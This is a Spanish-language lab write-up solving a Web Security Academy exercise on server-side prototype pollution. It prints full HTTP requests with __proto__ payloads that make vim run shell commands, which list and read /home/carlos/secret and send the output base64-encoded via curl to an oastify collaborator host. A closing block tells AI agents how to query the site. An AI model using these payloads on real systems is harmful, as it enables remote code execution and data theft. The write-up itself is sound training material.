# Lab 10: Exfiltrating sensitive data via server-side prototype pollution
Primero encontramos la siguiente peticion:
{% code overflow="wrap" %}
```json
POST /my-account/change-address HTTP/2
Host: 0ade001c03d1540682f0971f00b70020.web-security-academy.net
Cookie: session=9Z8pN21fPP7CZIMDolCzh7uAfP6FL594
Content-Length: 168
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"9Z8pN21fPP7CZIMDolCzh7uAfP6FL594"}
```
{% endcode %}
Lo anterior responde asi:
{% code overflow="wrap" %}
```json
HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"c4-o1d3jaxaEdwNnwhzORq6DYSiPxI"
Date: Tue, 25 Jun 2024 21:11:35 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 196
{"username":"wiener","firstname":"Peter","lastname":"Wiener","address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","isAdmin":true}
```
{% endcode %}
Teniendo en cuenta lo anterior, enviamos la siguiente peticion:
{% code overflow="wrap" %}
```json
POST /my-account/change-address HTTP/2
Host: 0ade001c03d1540682f0971f00b70020.web-security-academy.net
Cookie: session=9Z8pN21fPP7CZIMDolCzh7uAfP6FL594
Content-Length: 208
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"9Z8pN21fPP7CZIMDolCzh7uAfP6FL594","__proto__": {
"json spaces":10
}}
```
{% endcode %}
Y lo anterior, entrego la siguiente respuesta en raw:
```json
HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"14e-/rxYzhSfiD4zL1vVonmGpZgVmW0"
Date: Tue, 25 Jun 2024 21:11:52 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 334
{
"username": "wiener",
"firstname": "Peter",
"lastname": "Wiener",
"address_line_1": "Wiener HQ",
"address_line_2": "One Wiener Way",
"city": "Wienerville",
"postcode": "BU1 1RP",
"country": "UK",
"isAdmin": true,
"json spaces": 10
}
```
Los 10 espacios antecedidos por cada objeto indica que es susceptible a este tipo de ataques.
Al acceder al apartado de admin:
Al clickear al button previo se genera la siguiente petición:
{% code overflow="wrap" %}
```json
POST /admin/jobs HTTP/2
Host: 0ade001c03d1540682f0971f00b70020.web-security-academy.net
Cookie: session=9Z8pN21fPP7CZIMDolCzh7uAfP6FL594
Content-Length: 126
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ade001c03d1540682f0971f00b70020.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"csrf":"E5PnMR6lCAZooCcKBud78idhOfsoN5TZ","sessionId":"9Z8pN21fPP7CZIMDolCzh7uAfP6FL594","tasks":["db-cleanup","fs-cleanup"]}
```
{% endcode %}
La petición previa entrega la siguiente respuesta:
{% code overflow="wrap" %}
```json
HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"1c7-o/UMl8aG2WYfWY22q3KHWd04RGU"
Date: Tue, 25 Jun 2024 21:16:53 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 455
{
"results": [
{
"name": "db-cleanup",
"description": "Database cleanup",
"success": true
},
{
"name": "fs-cleanup",
"description": "Filesystem cleanup",
"success": true
}
]
}
```
{% endcode %}
Esto genera tareas en segundo plano que limpian la base de datos y el sistema de archivos.
Por lo anterior, generamos un collaborator y enviamos la siguiente peticion:
```json
POST /my-account/change-address HTTP/2
Host: 0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Cookie: session=4tH7NKRjQmuej0xm7k7XQpweZtk40bS7
Content-Length: 284
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"4tH7NKRjQmuej0xm7k7XQpweZtk40bS7","__proto__": {
"shell":"vim",
"input":":! curl https://em4or21l4n6gh8j45x85zbha51btzlna.oastify.com\n"
}}
```
La respuesta de la peticion previa es:
{% code overflow="wrap" %}
```json
HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"11b-xEcQdnwNDfeY/SNwPrhCfg+9Ubs"
Date: Wed, 26 Jun 2024 15:51:49 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 283
{"username":"wiener","firstname":"Peter","lastname":"Wiener","address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","isAdmin":true,"shell":"vim","input":":! curl https://em4or21l4n6gh8j45x85zbha51btzlna.oastify.com\n"}
```
{% endcode %}
El payload utilizado es:
```json
,"__proto__": {
"shell":"vim",
"input":":! curl https://em4or21l4n6gh8j45x85zbha51btzlna.oastify.com\n"
}
```
Luego de lo anterior, clickeamos en el button de "iniciar tarea":
Y luego de enviar la petición previa sobre actualización de datos y enviar la petición de inicio de tarea, se detecta trafico en el collaborator:
Gracias a lo anterior, sabemos que tenemos la posibilidad de utilizar el RCE:
Asi que para resolver el ejercicio utilizaremos el siguiente payload que codifica la salida del comando ls en base64 y luego la envia al collaborator:
{% code overflow="wrap" %}
```json
"input":":! ls /home/carlos | base64 | curl -d @- https://79ehevoergt9416xsqvym443suymmfa4.oastify.com\n"
```
{% endcode %}
Luego de enviar la peticion:
```bash
POST /my-account/change-address HTTP/2
Host: 0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Cookie: session=4tH7NKRjQmuej0xm7k7XQpweZtk40bS7
Content-Length: 317
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"4tH7NKRjQmuej0xm7k7XQpweZtk40bS7","__proto__": {
"shell":"vim",
"input":":! ls /home/carlos | base64 | curl -d @- https://79ehevoergt9416xsqvym443suymmfa4.oastify.com\n"
}}
```
Y luego de enviar la peticion del button:
La respuesta de la peticion del button es la siguiente:
{% code overflow="wrap" %}
```json
{
"results": [
{
"name": "db-cleanup",
"success": false,
"error": {
"code": 1,
"message": "Command failed: od -An -N1 -i /dev/random\nVim: Warning: Output is not to a terminal\nVim: Warning: Input is not from a terminal\n\r\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 79 100 55 100 24 1666 727 --:--:-- --:--:-- --:--:-- 2393\n\r\nPress ENTER or type command to continue\r\n"
}
},
{
"name": "fs-cleanup",
"success": false,
"error": {
"code": 1,
"message": "Command failed: od -An -N1 -i /dev/random\nVim: Warning: Output is not to a terminal\nVim: Warning: Input is not from a terminal\n\r\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 79 100 55 100 24 2500 1090 --:--:-- --:--:-- --:--:-- 3590\n\r\nPress ENTER or type command to continue\r\n"
}
}
]
}
```
{% endcode %}
Y en el collaborator se obtiene el siguiente trafico:
Al decodificar el base64 encontramos esto:
```
node_apps
secret
```
Por lo anterior, finalizamos enviando la siguiente carga:
```bash
POST /my-account/change-address HTTP/2
Host: 0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Cookie: session=4tH7NKRjQmuej0xm7k7XQpweZtk40bS7
Content-Length: 325
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a7e008b0499e6c481688ab4000900af.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i
{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"4tH7NKRjQmuej0xm7k7XQpweZtk40bS7","__proto__": {
"shell":"vim",
"input":":! cat /home/carlos/secret | base64 | curl -d @- https://79ehevoergt9416xsqvym443suymmfa4.oastify.com\n"
}}
```
Y logramos obtener el secreto luego de consumir el servicio previo y luego el del button:
```bash
POST / HTTP/1.1
Host: 79ehevoergt9416xsqvym443suymmfa4.oastify.com
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
RXl2cDZwVkgyNUZFWnJWaFNXVEg5dEkyVmVwUzFoUWs=
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://books.spartan-cybersec.com/web/prototype-pollution/lab-10-exfiltrating-sensitive-data-via-server-side-prototype-pollution.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.